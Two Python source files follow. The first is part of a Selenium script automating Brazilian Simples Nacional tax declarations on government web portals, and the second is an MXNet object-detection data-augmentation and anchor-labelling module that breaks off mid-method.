cpcp.send_keys(CNPJ)
cpfcpf = driver.find_element_by_name('ctl00$ContentPlaceHolder$txtCPFResponsavel')
cpfcpf.clear()
cpfcpf.send_keys(CPF)
cod = driver.find_element_by_name('ctl00$ContentPlaceHolder$txtCodigoAcesso')
cod.clear()
cod.send_keys(CodSim)
cod_caract = driver.find_element_by_id('txtTexto_captcha_serpro_gov_br')
btn_som = driver.find_element_by_id('btnTocarSom_captcha_serpro_gov_br')
sleep(2.5)
btn_som.click()
sleep(.5)
cod_caract.click()
print(f'PRESSIONE ENTER P/ PROSSEGUIR, {CLIENTE}')
press_key_b4('enter')
while True:
try:
submit = driver.find_element_by_xpath("//input[@type='submit']").click()
break
except (NoSuchElementException, ElementClickInterceptedException):
print('sleepin'
'g, line 167. Cadê o submit?')
driver.refresh()
sleep(5)
sleep(5)
def change_ecac_client(self, CNPJ):
""":return: vai até ao site de declaração do ECAC."""
driver = self.driver
def elem_with_text(elem, searched):
_tag = driver.find_element_by_xpath(f"//{elem}[contains(text(),'{searched.rstrip()}')]")
return _tag
self.tags_wait('html', 'span')
sleep(5)
# nextcl = elem_with_text("span", "Alterar perfil de acesso")
# nextcl.click()
btn_perfil = WebDriverWait(self.driver, 20).until(
expected_conditions.presence_of_element_located((By.ID, 'btnPerfil')))
self.click_ac_elementors(btn_perfil)
# altera perfil e manda o cnpj
self.tags_wait('label')
cnpj = elem_with_text("label", "Procurador de pessoa jurídica - CNPJ")
cnpj.click()
sleep(.5)
self.send_keys_anywhere(CNPJ)
sleep(1)
self.send_keys_anywhere(Keys.TAB)
self.send_keys_anywhere(Keys.ENTER)
sleep(1)
# driver.find_element_by_class_name('access-button').click()
# sleep(10)
antigo = driver.current_url
"""I GOT IT"""
# switch_to.frame...
sleep(5)
driver.get(
'https://sinac.cav.receita.fazenda.gov.br/simplesnacional/aplicacoes/atspo/pgdasd2018.app/')
sleep(2.5)
driver.get(antigo)
driver.get('https://cav.receita.fazenda.gov.br/ecac/Aplicacao.aspx?id=10009&origem=menu')
driver.switch_to.frame(driver.find_element_by_tag_name("iframe"))
sleep(2)
while True:
try:
driver.find_element_by_xpath('//span[@class="glyphicon glyphicon-off"]').click()
driver.refresh()
break
except ElementClickInterceptedException:
print('---> PRESSIONE ESC PARA CONTINUAR <--- glyphicon-off intercepted')
press_key_b4('esc')
except NoSuchElementException:
print('---> PRESSIONE ESC PARA CONTINUAR NoSuchElement glyphicon-off')
press_key_b4('esc')
driver.get(
'https://sinac.cav.receita.fazenda.gov.br/simplesnacional/aplicacoes/atspo/pgdasd2018.app/')
driver.implicitly_wait(5)
break
sleep(3)
driver.switch_to.default_content()
"""I GOT IT"""
# chegou em todo mundo...
driver.get(
'https://sinac.cav.receita.fazenda.gov.br/simplesnacional/aplicacoes/atspo/pgdasd2018.app/')
driver.implicitly_wait(5)
def compt_typist(self, compt, came_from=None):
"""
:param compt: competência, format: 'MM-YYYY'
:param came_from: link where it comes from (multiples DECLARAÇÕES)
:return: the unica declaração
"""
driver = self.driver
print('ÚNICA DECLARACAO')
print('JA_DECLARED não -> prossegue')
onlif = 'declaracao'
if came_from:
came_from = came_from.replace(came_from[0], '') if came_from[0] == '/' else came_from
driver.get(came_from+'/'+onlif)
else:
if onlif not in driver.current_url:
driver.execute_script(f"""window.location.href += '{onlif}?clear=1'""")
self.tags_wait('body', 'input')
driver.implicitly_wait(10)
sleep(2.5)
try:
periodo = driver.find_element_by_id('pa')
periodo.send_keys(compt)
self.find_submit_form()
except NoSuchElementException:
pass
def check_make_pendencies(self):
driver = self.driver
try:
error_msg = driver.find_elements_by_class_name('errorMsg')
if len(error_msg) == 2:
compt_pendencias = error_msg[0].text
# tam_ano = len(str(self.y()))
compt_pendencias = compt_pendencias.split(':')
compt_pendencias = ''.join(compt_pendencias).split(',')
compt_pendencias = ''.join(compt_pendencias).split('.')
compt_pendencias = ''.join(compt_pendencias).split(' ')
compt_pendencias = [vv for vv in compt_pendencias if '/' in vv]
compt_pendencias = [vv.replace('/', '-') for vv in compt_pendencias]
print(compt_pendencias)
if len(compt_pendencias) <= 11:
print('\033[1;31mPOR PADRÃO, check_make_pendencies irá zerar o valor...\033[m')
return compt_pendencias
else:
return False
# raise IOError('FAZER COMPETÊNCIAS PASSADAS...')
except NoSuchElementException as e:
raise e
def DECLARA(self, compt, sheet_id, valor_declarado, my_new_3valores, cont_ret_n_ret):
driver = self.driver
after_READ = self.after_READ
declara_client = self.now_person
try:
js_confirm = driver.find_element_by_id('jsMsgBoxConfirm')
tk_msg('F2 para somente gerar os últimos 3 arquivos de declarações.\n F4 para RETIFICAR'
'\nF10 p/ consolidar para ultima data do mês\n\n'
'\nF11 Para passar para o próximo cliente \n\n'
'Espere ou clique OK', 10)
# não consegui callback em mensagem
which_one = press_keys_b4('f2', 'f4', 'f10', 'f11')
print(type(which_one))
print(which_one)
if which_one == 'f2':
# consultar declarações, baixar arquivos
self.simples_and_ecac_utilities(2, compt)
elif which_one == 'f4':
print('RETIFICA!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
driver.execute_script("""
window.location.href = '/SimplesNacional/Aplicacoes/ATSPO/pgdasd2018.app/Pa/Retificar'""")
# raise vai fazer a ratificação
raise NoSuchElementException
elif which_one == 'f10':
self.simples_and_ecac_utilities(1, compt)
# F10 p/ consolidar para ultima data do mês
elif which_one == 'f11':
pass
except NoSuchElementException:
print('ALREADY FALSE')
sleep(2.5)
inp = driver.find_elements_by_tag_name('input')[0]
sleep(3)
print('R$', valor_declarado)
inp = driver.find_elements_by_tag_name('input')[0]
inp.clear()
inp.send_keys(valor_declarado)
for i in range(2):
inp.send_keys(Keys.TAB)
self.find_submit_form()
sleep(3)
print(f'{valor_declarado}, olha o valor aqui')
if sheet_id == 0 or valor_declarado == '':
for i in range(2):
self.tags_wait('form')
sleep(3)
try:
self.find_submit_form()
except NoSuchElementException:
driver.find_elements_by_class_name('btn-success')[1].click()
# em teste
# ISS, index 1
elif sheet_id == 1:
def trata_retencoes(v):
try:
if float(eval(str(v).replace(',', '.'))) == 0:
v = ''
except SyntaxError:
# return v
v = v
finally:
return v
if not my_new_3valores:
"""
SemRetencao = self.trata_money_excel(after_READ['NÃO RETIDO'][cont_ret_n_ret])
ComRetencao = self.trata_money_excel(after_READ['RETIDO'][cont_ret_n_ret])
# padronizar essa parte
"""
SemRetencao = self.trata_money_excel(after_READ['Sem Retenção'][cont_ret_n_ret])
ComRetencao = self.trata_money_excel(after_READ['Com Retenção'][cont_ret_n_ret])
# input('if not')
else:
SemRetencao = self.trata_money_excel([v for v in my_new_3valores[2].values()][0])
ComRetencao = self.trata_money_excel([v for v in my_new_3valores[1].values()][0])
# input('else')
print('~~~~~~~~~~~~' * 30)
print(f'ANTES, Com Retenção: {ComRetencao}, Sem:{SemRetencao}')
ComRetencao = trata_retencoes(ComRetencao)
SemRetencao = trata_retencoes(SemRetencao)
print('~~~~~~~~~~~~' * 30)
print(f'Com Retenção: {ComRetencao}, Sem:{SemRetencao}')
# input('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa')
print('~~~~~~~~~~~~' * 30)
self.tags_wait('a')
prestacao_serv = driver.find_element_by_id('btn-exibe-todos')
prestacao_serv.click()
sleep(2.5)
if SemRetencao != '' and ComRetencao == '':
print('Só teve SEM RETENÇÃO')
self.send_keys_anywhere(Keys.TAB, 17 + 1)
self.send_keys_anywhere(Keys.ENTER)
self.find_submit_form() # SUBMITA retenções s/ valor ainda
sleep(2.5)
self.send_keys_anywhere(valor_declarado)
self.send_keys_anywhere(Keys.ENTER) # submita o valor
sleep(2.5)
self.send_keys_anywhere(Keys.ENTER) # calcular
sleep(3)
self.find_submit_form()
sleep(2)
elif SemRetencao != '' and ComRetencao != '':
print('Retido e não retido.')
self.send_keys_anywhere(Keys.TAB, 17 + 1)
self.send_keys_anywhere(Keys.ENTER)
self.send_keys_anywhere(Keys.TAB, 1)
self.send_keys_anywhere(Keys.ENTER)
self.find_submit_form() # SUBMITA retenções s/ valor ainda
sleep(2)
self.send_keys_anywhere(SemRetencao)
self.send_keys_anywhere(Keys.TAB, 9)
self.send_keys_anywhere(ComRetencao)
self.send_keys_anywhere(Keys.ENTER) # calcular
sleep(3)
self.find_submit_form()
sleep(2)
elif SemRetencao == '' and ComRetencao != '':
print('\033[1;33mSó teve COM RETENÇÃO\033[m')
self.send_keys_anywhere(Keys.TAB, 17 + 2)
# +2 é COM retenção
self.send_keys_anywhere(Keys.ENTER)
self.find_submit_form() # SUBMITA retenções s/ valor ainda
sleep(2.5)
self.send_keys_anywhere(valor_declarado)
self.send_keys_anywhere(Keys.ENTER) # submita o valor
sleep(2.5)
self.send_keys_anywhere(Keys.ENTER) # calcular
sleep(3)
self.find_submit_form()
sleep(2)
# o valor já tá sendo tratado acima no IF master, mas ok
if valor_declarado != '':
sleep(.5)
driver.find_elements_by_class_name('btn-success')[1].click()
# self.GERA_PGDAS2 acima
sleep(3.5)
driver.implicitly_wait(5)
try:
self.find_submit_form()
except NoSuchElementException:
driver.find_elements_by_class_name('btn-success')[1].click()
# DOWNLOAD feito pois já está setado nos argumentos do driver
elif sheet_id == 2:
# ICMS
cont_vrv = cont_ret_n_ret
VRV = after_READ['Venda ou Revenda'][cont_vrv]
print(f'Venda ou revenda: {VRV}')
vrv = VRV.lower().strip()
self.tags_wait('a')
prestacao_serv = driver.find_element_by_id('btn-exibe-todos')
prestacao_serv.click()
sleep(2.5)
if vrv == 'revenda':
self.send_keys_anywhere(Keys.TAB, 3)
self.send_keys_anywhere(Keys.ENTER)
elif vrv == 'venda':
self.send_keys_anywhere(Keys.TAB, 7)
self.send_keys_anywhere(Keys.ENTER)
# o valor já tá sendo tratado acima no IF master, mas ok
if valor_declarado != '':
sleep(2)
self.find_submit_form()
self.tags_wait('body', 'input', 'form')
sleep(1.5)
self.send_keys_anywhere(valor_declarado)
sleep(1.5)
self.send_keys_anywhere(Keys.ENTER) # calcular
sleep(2.5)
self.tags_wait('body', 'input', 'form')
self.send_keys_anywhere(Keys.ENTER) # transmitir
sleep(2)
self.find_submit_form()
sleep(.5)
driver.find_elements_by_class_name('btn-success')[1].click()
sleep(2.5)
self.find_submit_form()
# gerou
# ~~~~~~~~~~~~~SEM-RETENÇÃO-universal~~~~~~~~~~~~~#
print('AFTER IFs')
# engloba
add = '-SemMovimento' if valor_declarado == '' else ''
save = self.certif_feito(self.client_path, add=add)
driver.save_screenshot(save)
self.simples_and_ecac_utilities(2, compt)
# gera protocolos de todo mundo
# ######################################################
# print('Esperando pressionar DOWN no excel...')
# press_key_b4('down')
def simples_and_ecac_utilities(self, option, compt):
"""
:param int option: somente de 1 a 2, sendo
:param str compt: competência
1 -> Gerar Das somente se for consolidar para outra DATA
2 -> Gerar Protocolos
:return:
"""
# estou na "declaração", aqui faço o que quiser
from datetime import datetime
now_year = str(datetime.now().year)
compt = ''.join(v for v in compt if v.isdigit())
month_compt = compt[:2]
year_compt = compt[2:]
driver = self.driver
current_url = self.current_url
link_gera_das, download_protocolos_das = 'Das/PorPa', '/Consulta'
if option == 2:
self.get_sub_site(download_protocolos_das, current_url)
driver.implicitly_wait(5)
if now_year != year_compt:
self.send_keys_anywhere(year_compt)
self.find_submit_form()
sleep(3.5)
comp_clic = driver.find_elements_by_class_name('pa')
lenc = len(comp_clic) - 1
comp_clic[lenc].click()
for i in range(3):
sleep(2)
self.send_keys_anywhere(Keys.TAB)
self.send_keys_anywhere(Keys.ENTER)
elif option == 1:
# gera das
venc_month_compt = int(month_compt) + 1
venc = self.get_last_business_day_of_month(venc_month_compt, int(year_compt))
retifica_p_dia = f'{venc}{venc_month_compt:02d}{year_compt}'
self.get_sub_site(link_gera_das, current_url)
self.tags_wait('input')
driver.implicitly_wait(10)
periodo = driver.find_element_by_id('pa')
periodo.send_keys(compt)
self.find_submit_form()
sleep(2.5)
# if len(driver.find_elements_by_id('msgBox')) == 0 # CASO NÃO EXISTA O DAS
consolida = driver.find_element_by_id('btnConsolidarOutraData')
consolida.click()
sleep(2.5)
validade_id = 'txtDataValidade'
driver.execute_script(f"document.getElementById('{validade_id}').focus();")
validade_change = driver.find_element_by_id(validade_id)
for e, val in enumerate(retifica_p_dia):
validade_change.send_keys(val)
if e == 0:
sleep(.25)
sleep(1)
driver.find_element_by_id('btnDataValidade').click()
# coloquei a validade
# gerei das
driver.implicitly_wait(5)
self.find_submit_form()
# GERAR DAS
else:
tk_msg(f'Tente outra opção, linha 550 +-, opc: {option}')
def opta_script(self):
driver = self.driver
try:
# #################################################### opta
self.get_sub_site('/RegimeApuracao/Optar', self.current_url)
# driver.execute_script("""window.location.href += '/RegimeApuracao/Optar'""")
from selenium.webdriver.support.ui import Select
anocalendario = Select(driver.find_element_by_id('anocalendario'))
anocalendario.select_by_value('2021')
self.find_submit_form()
# competencia
competencia, caixa = '0', '1'
driver.find_element_by_css_selector(f"input[type='radio'][value='{competencia}']").click()
self.find_submit_form()
sleep(2.5)
# driver.find_element_by_id('btnSimConfirm').click()
try:
driver.implicitly_wait(10)
self.click_ac_elementors(driver.find_element_by_class_name('glyphicon-save'))
except NoSuchElementException:
input('Não consegui')
else:
print('Não fui exceptado')
# ########################################################
except NoSuchElementException:
pass
finally:
driver.get(self.current_url)
driver.execute_script("""window.location.href += '/declaracao?clear=1'""")
sleep(2.5)
|
detection_input.py | from __future__ import division
from __future__ import print_function
import cv2
import numpy as np
import mxnet as mx
from queue import Queue
from threading import Thread
from operator_py.cython.bbox import bbox_overlaps_cython
from operator_py.bbox_transform import nonlinear_transform as bbox_transform
class DetectionAugmentation(object):
def __init__(self):
pass
def apply(self, input_record):
pass
class ReadRoiRecord(DetectionAugmentation):
"""
input: image_url, str
gt_url, str
output: image, ndarray(h, w, rgb)
image_raw_meta, tuple(h, w)
gt, any
"""
def __init__(self, gt_select):
super().__init__()
self.gt_select = gt_select
def apply(self, input_record):
image = cv2.imread(input_record["image_url"], cv2.IMREAD_COLOR)
input_record["image"] = image[:, :, ::-1].astype("float32")
# TODO: remove this compatibility method
input_record["gt_bbox"] = np.concatenate([input_record["gt_bbox"],
input_record["gt_class"].reshape(-1, 1)],
axis=1)
# gt_dict = pkl.load(input_record["gt_url"])
# for s in self.gt_select:
# input_record[s] = gt_dict[s]
class GroupRead(DetectionAugmentation):
"""
input: dataset version, int
output: rpn_group
rpn_group
"""
def __init__(self, pGroup):
super().__init__()
self.p = pGroup
def apply(self, input_record):
p = self.p
input_record["rpn_group"] = p.rpn_groups[input_record["version"]].copy()
input_record["box_group"] = p.box_groups[input_record["version"]].copy()
class Norm2DImage(DetectionAugmentation):
"""
input: image, ndarray(h, w, rgb)
output: image, ndarray(h, w, rgb)
"""
def __init__(self, pNorm):
super().__init__()
self.p = pNorm # type: NormParam
def apply(self, input_record):
p = self.p
image = input_record["image"].astype(np.float32)
image -= p.mean
image /= p.std
input_record["image"] = image
class Resize2DImageBbox(DetectionAugmentation):
"""
input: image, ndarray(h, w, rgb)
gt_bbox, ndarry(n, 5)
output: image, ndarray(h', w', rgb)
im_info, tuple(h', w', scale)
gt_bbox, ndarray(n, 5)
"""
def __init__(self, pResize):
super().__init__()
self.p = pResize # type: ResizeParam
def apply(self, input_record):
p = self.p
image = input_record["image"]
gt_bbox = input_record["gt_bbox"].astype(np.float32)
short = min(image.shape[:2])
long = max(image.shape[:2])
scale = min(p.short / short, p.long / long)
input_record["image"] = cv2.resize(image, None, None, scale, scale,
interpolation=cv2.INTER_LINEAR)
# make sure gt boxes do not overflow
gt_bbox[:, :4] = gt_bbox[:, :4] * scale
if image.shape[0] < image.shape[1]:
gt_bbox[:, [0, 2]] = np.clip(gt_bbox[:, [0, 2]], 0, p.long)
gt_bbox[:, [1, 3]] = np.clip(gt_bbox[:, [1, 3]], 0, p.short)
else:
gt_bbox[:, [0, 2]] = np.clip(gt_bbox[:, [0, 2]], 0, p.short)
gt_bbox[:, [1, 3]] = np.clip(gt_bbox[:, [1, 3]], 0, p.long)
input_record["gt_bbox"] = gt_bbox
# exactly as opencv
h, w = image.shape[:2]
input_record["im_info"] = np.array([round(h * scale), round(w * scale), scale], dtype=np.float32)
class Resize2DImage(DetectionAugmentation):
"""
input: image, ndarray(h, w, rgb)
gt_bbox, ndarry(n, 5)
output: image, ndarray(h', w', rgb)
im_info, tuple(h', w', scale)
gt_bbox, ndarray(n, 5)
"""
def __init__(self, pResize):
super().__init__()
self.p = pResize # type: ResizeParam
def apply(self, input_record):
p = self.p
image = input_record["image"]
short = min(image.shape[:2])
long = max(image.shape[:2])
scale = min(p.short / short, p.long / long)
input_record["image"] = cv2.resize(image, None, None, scale, scale,
interpolation=cv2.INTER_LINEAR)
# exactly as opencv
h, w = image.shape[:2]
input_record["im_info"] = np.array([round(h * scale), round(w * scale), scale], dtype=np.float32)
class Resize2DImageByRoidb(DetectionAugmentation):
"""
input: image, ndarray(h, w, rgb)
gt_bbox, ndarry(n, 5)
output: image, ndarray(h', w', rgb)
im_info, tuple(h', w', scale)
gt_bbox, ndarray(n, 5)
"""
def __init__(self):
super().__init__()
class ResizeParam:
long = None
short = None
self.resize_aug = Resize2DImage(ResizeParam)
def apply(self, input_record):
self.resize_aug.p.long = input_record["resize_long"]
self.resize_aug.p.short = input_record["resize_short"]
self.resize_aug.apply(input_record)
class RandResize2DImageBbox(DetectionAugmentation):
"""
input: image, ndarray(h, w, rgb)
gt_bbox, ndarry(n, 4)
output: image, ndarray(h', w', rgb)
im_info, tuple(h', w', scale)
gt_bbox, ndarray(n, 4)
"""
def __init__(self, pRandResize):
super().__init__()
self.p = pRandResize
class ResizeParam:
long = None
short = None
self.resize_aug = Resize2DImageBbox(ResizeParam)
def apply(self, input_record):
scale_id = np.random.randint(len(self.p.long_ranges))
self.resize_aug.p.long = self.p.long_ranges[scale_id]
self.resize_aug.p.short = self.p.short_ranges[scale_id]
self.resize_aug.apply(input_record)
class Flip2DImageBbox(DetectionAugmentation):
"""
input: image, ndarray(h, w, rgb)
gt_bbox, ndarry(n, 4)
output: image, ndarray(h, w, rgb)
gt_bbox, ndarray(n, 4)
"""
def __init__(self):
super().__init__()
def apply(self, input_record):
if input_record["flipped"]:
image = input_record["image"]
gt_bbox = input_record["gt_bbox"]
input_record["image"] = image[:, ::-1]
flipped_bbox = gt_bbox.copy()
h, w = image.shape[:2]
flipped_bbox[:, 0] = (w - 1) - gt_bbox[:, 2]
flipped_bbox[:, 2] = (w - 1) - gt_bbox[:, 0]
input_record["gt_bbox"] = flipped_bbox
class RandCrop2DImageBbox(DetectionAugmentation):
def __init__(self, pCrop):
super().__init__()
self.p = pCrop
assert pCrop.mode in ["center", "random"], "The {} crop mode is not supported".format(pCrop.mode)
def apply(self, input_record):
p = self.p
image = input_record["image"]
gt_bbox = input_record["gt_bbox"]
if image.shape[0] >= image.shape[1]:
crop_w, crop_h = p.short, p.long
else:
crop_w, crop_h = p.long, p.short
crop_w = min(crop_w, image.shape[1])
crop_h = min(crop_h, image.shape[0])
if p.mode == "center" and gt_bbox.shape[0] > 0:
# random select a box as cropping center
rand_index = np.random.randint(gt_bbox.shape[0])
box = gt_bbox[rand_index, :]
# decide start point
ctr_x = (box[2] + box[0]) / 2.0
ctr_y = (box[3] + box[1]) / 2.0
noise_h = np.random.randint(-10, 10)
noise_w = np.random.randint(-30, 30)
start_h = int(round(ctr_y - crop_h / 2)) + noise_h
start_w = int(round(ctr_x - crop_w / 2)) + noise_w
end_h = start_h + crop_h
end_w = start_w + crop_w
# prevent crop cross border
if start_h < 0:
off = -start_h
start_h += off
end_h += off
if start_w < 0:
off = -start_w
start_w += off
end_w += off
if end_h > image.shape[0]:
off = end_h - image.shape[0]
end_h -= off
start_h -= off
if end_w > image.shape[1]:
off = end_w - image.shape[1]
end_w -= off
start_w -= off
else:
# random crop from image
start_h = np.random.randint(0, image.shape[0] - crop_h + 1)
start_w = np.random.randint(0, image.shape[1] - crop_w + 1)
end_h = start_h + crop_h
end_w = start_w + crop_w
assert start_h >= 0 and start_w >= 0 and end_h <= image.shape[0] and end_w <= image.shape[1]
# crop then resize
im_cropped = image[start_h:end_h, start_w:end_w, :]
# transform ground truth
ctrs_x = (gt_bbox[:, 2] + gt_bbox[:, 0]) / 2.0
ctrs_y = (gt_bbox[:, 3] + gt_bbox[:, 1]) / 2.0
keep = np.where((ctrs_y > start_h) & (ctrs_x > start_w) & (ctrs_y < end_h) & (ctrs_x < end_w))
gt_bbox = gt_bbox[keep]
gt_bbox[:, [0, 2]] -= start_w
gt_bbox[:, [1, 3]] -= start_h
gt_bbox[:, [0, 2]] = np.clip(gt_bbox[:, [0, 2]], 0, crop_w - 1)
gt_bbox[:, [1, 3]] = np.clip(gt_bbox[:, [1, 3]], 0, crop_h - 1)
input_record["image"] = im_cropped
input_record["gt_bbox"] = gt_bbox
input_record["im_info"] = np.array([crop_h, crop_w, input_record["im_info"][2]], dtype=np.float32)
class Pad2DImageBbox(DetectionAugmentation):
"""
input: image, ndarray(h, w, rgb)
gt_bbox, ndarry(n, 5)
output: image, ndarray(h, w, rgb)
gt_bbox, ndarray(max_num_gt, 5)
"""
def __init__(self, pPad):
super().__init__()
self.p = pPad # type: PadParam
def apply(self, input_record):
p = self.p
image = input_record["image"]
gt_bbox = input_record["gt_bbox"]
h, w = image.shape[:2]
shape = (p.long, p.short, 3) if h >= w \
else (p.short, p.long, 3)
padded_image = np.zeros(shape, dtype=np.float32)
padded_image[:h, :w] = image
padded_gt_bbox = np.full(shape=(p.max_num_gt, 5), fill_value=-1, dtype=np.float32)
padded_gt_bbox[:len(gt_bbox)] = gt_bbox
input_record["image"] = padded_image
input_record["gt_bbox"] = padded_gt_bbox
class Pad2DImage(DetectionAugmentation):
"""
input: image, ndarray(h, w, rgb)
gt_bbox, ndarry(n, 5)
output: image, ndarray(h, w, rgb)
gt_bbox, ndarray(max_num_gt, 5)
"""
def __init__(self, pPad):
super().__init__()
self.p = pPad # type: PadParam
def apply(self, input_record):
p = self.p
image = input_record["image"]
h, w = image.shape[:2]
shape = (p.long, p.short, 3) if h >= w \
else (p.short, p.long, 3)
padded_image = np.zeros(shape, dtype=np.float32)
padded_image[:h, :w] = image
input_record["image"] = padded_image
class ConvertImageFromHwcToChw(DetectionAugmentation):
def __init__(self):
super().__init__()
def apply(self, input_record):
input_record["image"] = input_record["image"].transpose((2, 0, 1))
class AnchorTarget2D(DetectionAugmentation):
"""
input: image_meta: tuple(h, w, scale)
gt_bbox, ndarry(max_num_gt, 5)
output: anchor_label, ndarray(num_anchor * 2, h, w)
anchor_bbox_target, ndarray(num_anchor * 4, h, w)
anchor_bbox_weight, ndarray(num_anchor * 4, h, w)
"""
def __init__(self, pAnchor):
super().__init__()
self.p = pAnchor # type: AnchorTarget2DParam
self.__base_anchor = None
self.__v_all_anchor = None
self.__h_all_anchor = None
self.__num_anchor = None
self.DEBUG = False
@property
def base_anchor(self):
if self.__base_anchor is not None:
return self.__base_anchor
p = self.p
base_anchor = np.array([0, 0, p.generate.stride - 1, self.p.generate.stride - 1])
w = base_anchor[2] - base_anchor[0] + 1
h = base_anchor[3] - base_anchor[1] + 1
x_ctr = base_anchor[0] + 0.5 * (w - 1)
y_ctr = base_anchor[1] + 0.5 * (h - 1)
w_ratios = np.round(np.sqrt(w * h / p.generate.aspects))
h_ratios = np.round(w_ratios * p.generate.aspects)
ws = (np.outer(w_ratios, p.generate.scales)).reshape(-1)
hs = (np.outer(h_ratios, p.generate.scales)).reshape(-1)
base_anchor = np.stack(
[x_ctr - 0.5 * (ws - 1),
y_ctr - 0.5 * (hs - 1),
x_ctr + 0.5 * (ws - 1),
y_ctr + 0.5 * (hs - 1)],
axis=1)
self.__base_anchor = base_anchor
return self.__base_anchor
@property
def v_all_anchor(self):
if self.__v_all_anchor is not None:
return self.__v_all_anchor
p = self.p
shift_x = np.arange(0, p.generate.short, dtype=np.float32) * p.generate.stride
shift_y = np.arange(0, p.generate.long, dtype=np.float32) * p.generate.stride
grid_x, grid_y = np.meshgrid(shift_x, shift_y)
grid_x, grid_y = grid_x.reshape(-1), grid_y.reshape(-1)
grid = np.stack([grid_x, grid_y, grid_x, grid_y], axis=1)
all_anchor = grid[:, None, :] + self.base_anchor[None, :, :]
all_anchor = all_anchor.reshape(-1, 4)
self.__v_all_anchor = all_anchor
self.__num_anchor = all_anchor.shape[0]
return self.__v_all_anchor
@property
def h_all_anchor(self):
if self.__h_all_anchor is not None:
return self.__h_all_anchor
p = self.p
shift_x = np.arange(0, p.generate.long, dtype=np.float32) * p.generate.stride
shift_y = np.arange(0, p.generate.short, dtype=np.float32) * p.generate.stride
grid_x, grid_y = np.meshgrid(shift_x, shift_y)
grid_x, grid_y = grid_x.reshape(-1), grid_y.reshape(-1)
grid = np.stack([grid_x, grid_y, grid_x, grid_y], axis=1)
all_anchor = grid[:, None, :] + self.base_anchor[None, :, :]
all_anchor = all_anchor.reshape(-1, 4)
self.__h_all_anchor = all_anchor
self.__num_anchor = all_anchor.shape[0]
return self.__h_all_anchor
@v_all_anchor.setter
def v_all_anchor(self, value):
self.__v_all_anchor = value
self.__num_anchor = value.shape[0]
@h_all_anchor.setter
def h_all_anchor(self, value):
self.__h_all_anchor = value
self.__num_anchor = value.shape[0]
def _assign_label_to_anchor(self, valid_anchor, gt_bbox, neg_thr, pos_thr, min_pos_thr):
num_anchor = valid_anchor.shape[0]
cls_label = np.full(shape=(num_anchor,), fill_value=-1, dtype=np.float32)
if len(gt_bbox) > 0:
# num_anchor x num_gt
overlaps = bbox_overlaps_cython(valid_anchor.astype(np.float32, copy=False), gt_bbox.astype(np.float32, copy=False))
max_overlaps = overlaps.max(axis=1)
argmax_overlaps = overlaps.argmax(axis=1)
gt_max_overlaps = overlaps.max(axis=0)
# TODO: speed up this
# TODO: fix potentially assigning wrong anchors as positive
# A correct implementation is given as
# gt_argmax_overlaps = np.where((overlaps.transpose() == gt_max_overlaps[:, None]) &
# (overlaps.transpose() >= min_pos_thr))[1]
gt_argmax_overlaps = np.where((overlaps == gt_max_overlaps) &
(overlaps >= min_pos_thr))[0]
# anchor class
cls_label[max_overlaps < neg_thr] = 0
# fg label: for each gt, anchor with highest overlap
cls_label[gt_argmax_overlaps] = 1
# fg label: above threshold IoU
cls_label[max_overlaps >= pos_thr] = 1
else:
cls_label[:] = 0
argmax_overlaps = np.zeros(shape=(num_anchor, ))
return cls_label, argmax_overlaps
def _assign_label_to_anchor_group(self, valid_anchor, gt_bbox, gt_class, neg_thr, pos_thr, min_pos_thr):
num_anchor = valid_anchor.shape[0]
cls_label = np.full(shape=(num_anchor,), fill_value=-1, dtype=np.float32)
if len(gt_bbox) > 0:
# num_anchor x num_gt
overlaps = bbox_overlaps_cython(valid_anchor.astype(np.float32, copy=False), gt_bbox.astype(np.float32, copy=False))
max_overlaps = overlaps.max(axis=1)
argmax_overlaps = overlaps.argmax(axis=1)
gt_max_overlaps = overlaps.max(axis=0)
mask_label_map = np.tile(gt_class.reshape(-1).astype(np.float32), num_anchor).reshape(num_anchor, -1)
max_overlaps_label = mask_label_map[np.arange(num_anchor), argmax_overlaps]
gt_argmax_overlaps = np.where((overlaps == gt_max_overlaps) & (overlaps >= min_pos_thr))
# anchor class
cls_label[max_overlaps < neg_thr] = 0
# fg label: for each gt, anchor with highest overlap
cls_label[gt_argmax_overlaps[0]] = mask_label_map[gt_argmax_overlaps]
# fg label: above threshold IoU
fg_label_idxs = np.where(max_overlaps >= pos_thr)[0]
cls_label[fg_label_idxs] = max_overlaps_label[fg_label_idxs]
else:
cls_label[:] = 0
argmax_overlaps = np.zeros(shape=(num_anchor, ))
return cls_label, argmax_overlaps
def _sample_anchor(self, label, num, fg_fraction):
num_fg = int(fg_fraction * num)
fg_inds = np.where(label >= 1)[0]
if len(fg_inds) > num_fg:
disable_inds = np.random.choice(fg_inds, size=(len(fg_inds) - num_fg), replace=False)
if self.DEBUG:
disable_inds = fg_inds[:(len(fg_inds) - num_fg)]
label[disable_inds] = -1
num_bg = num - np.sum(label >= 1)
bg_inds = np.where(label == 0)[0]
if len(bg_inds) > num_bg:
disable_inds = np.random.choice(bg_inds, size=(len(bg_inds) - num_bg), replace=False)
if self.DEBUG:
disable_inds = bg_inds[:(len(bg_inds) - num_bg)]
label[disable_inds] = -1
def _cal_anchor_target(self, label, valid_anchor, gt_bbox, anchor_label):
num_anchor = valid_anchor.shape[0]
reg_target = np.zeros(shape=(num_anchor, 4), dtype=np.float32)
reg_weight = np.zeros(shape=(num_anchor, 4), dtype=np.float32)
fg_index = np.where(label >= 1)[0]
if len(fg_index) > 0:
reg_target[fg_index] = bbox_transform(valid_anchor[fg_index], gt_bbox[anchor_label[fg_index], :4])
reg_weight[fg_index, :] = 1.0
return reg_target, reg_weight
def _gather_valid_anchor(self, image_info):
h, w = image_info[:2]
all_anchor = self.v_all_anchor if h >= w else self.h_all_anchor
allowed_border = self.p.assign.allowed_border
valid_index = np.where((all_anchor[:, 0] >= -allowed_border) &
(all_anchor[:, 1] >= -allowed_border) &
(all_anchor[:, 2] < w + allowed_border) &
(all_anchor[:, 3] < h + allowed_border))[0]
return valid_index, all_anchor[valid_index]
def _scatter_valid_anchor(self, valid_index, cls_label, reg_target, reg_weight):
num_anchor = self.__num_anchor
all_cls_label = np.full(shape=(num_anchor,), fill_value=-1, dtype=np.float32)
all_reg_target = np.zeros(shape=(num_anchor, 4), dtype=np.float32)
all_reg_weight = np.zeros(shape=(num_anchor, 4), dtype=np.float32)
all_cls_label[valid_index] = cls_label
all_reg_target[valid_index] = reg_target
all_reg_weight[valid_index] = reg_weight
return all_cls_label, all_reg_target, all_reg_weight
def apply(self, input_record):
p = self.p
